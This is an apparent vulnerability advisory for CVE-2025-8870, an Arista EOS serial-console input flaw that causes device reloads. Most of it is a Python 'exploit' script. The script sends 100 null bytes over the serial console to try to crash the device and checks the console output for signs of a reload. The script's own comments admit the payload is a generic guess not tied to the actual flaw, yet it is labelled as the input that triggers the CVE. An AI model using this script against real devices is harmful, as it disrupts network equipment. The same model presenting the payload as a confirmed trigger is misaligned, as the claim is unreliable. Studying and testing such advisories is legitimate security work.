On affected platforms running Arista EOS, certain serial console input might result in an unexpected reload of the device.
CVSS Details
CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H
Configurations (Affected Products)
No configuration data available.
Arista EOS(具体受影响版本需参考官方安全公告)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8870 PoC - Arista EOS Serial Console DoS
# This PoC demonstrates how specific serial console input can trigger device reload
# NOTE: This requires physical access to the device's serial console port
import serial
import time
import sys
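def exploit_cve_2025_8870(serial_port='/dev/ttyUSB0', baud_rate=9600):
    """
    Exploit for CVE-2025-8870: Arista EOS Serial Console Input DoS

    Opens the serial port, writes one fixed byte pattern, waits, and reports
    whether the text read back mentions a reload or restart.

    Prerequisites:
    - Physical access to device serial console port (when assessing
      exposure, also count any console/terminal server wired to that port)
    - Serial cable (USB-to-Serial or standard serial cable)
    - Serial terminal software or python serial library

    Usage:
    python cve_2025_8870_poc.py /dev/ttyUSB0 9600

    Args:
        serial_port: Device path of the local serial adapter.
        baud_rate: Line speed; the port is opened 8 data bits, no parity,
            1 stop bit with a 5-second read timeout.

    Returns:
        True if the console output read after the write contains "reload"
        or "restart" (case-insensitive). False otherwise, including when
        the port cannot be opened.

    Limits of the result:
        - The byte pattern below is a generic guess; nothing in this listing
          ties it to the vendor's description of the flaw, so a False result
          does not show that a device is unaffected.
        - A True result is a substring match on console text inside a fixed
          5-second window. Confirm an actual reload from the device side
          (uptime, reload-cause records) before drawing conclusions.
    """
    print(f"[*] Connecting to serial console at {serial_port} ({baud_rate} baud)")
    try:
        ser = serial.Serial(
            port=serial_port,
            baudrate=baud_rate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=5
        )
    except serial.SerialException as e:
        print(f"[-] Failed to open serial port: {e}")
        return False

    # The original placed ser.close() after both return statements, so it was
    # never reached and the port stayed open. try/finally releases the port on
    # every exit path, including an exception raised by read() or write().
    try:
        print("[+] Connected to serial console")
        print("[*] Waiting for device prompt...")
        time.sleep(3)

        # Read initial output (whatever is already buffered; may be empty).
        response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
        print(f"[>] Device response: {response[:200]}...")

        # Malicious input that triggers the vulnerability
        # The specific input pattern may vary depending on EOS version
        # NOTE(review): unverified pattern, see "Limits of the result" above.
        malicious_input = "\x00" * 100 + "\n"  # Null bytes followed by newline
        print("[*] Sending malicious input to trigger CVE-2025-8870...")
        ser.write(malicious_input.encode('utf-8'))
        ser.flush()

        print("[*] Waiting for device response...")
        time.sleep(5)

        # Check if device is still responding. This only inspects buffered
        # console text; a device that reloads without printing either word
        # in the window is reported as False.
        response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
        lowered = response.lower()
        if "reload" in lowered or "restart" in lowered:
            print("[!] Device appears to be reloading - vulnerability confirmed")
            return True

        # The message below is informational only: no further input is sent.
        print("[*] Device still operational - trying alternative input patterns")
        return False
    finally:
        ser.close()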
if __name__ == "__main__":
    # Optional positional arguments: [serial_port] [baud_rate].
    # Defaults match the function's own defaults.
    cli_args = sys.argv[1:]
    port = cli_args[0] if cli_args else '/dev/ttyUSB0'
    baud = int(cli_args[1]) if len(cli_args) > 1 else 9600
    exploit_cve_2025_8870(port, baud)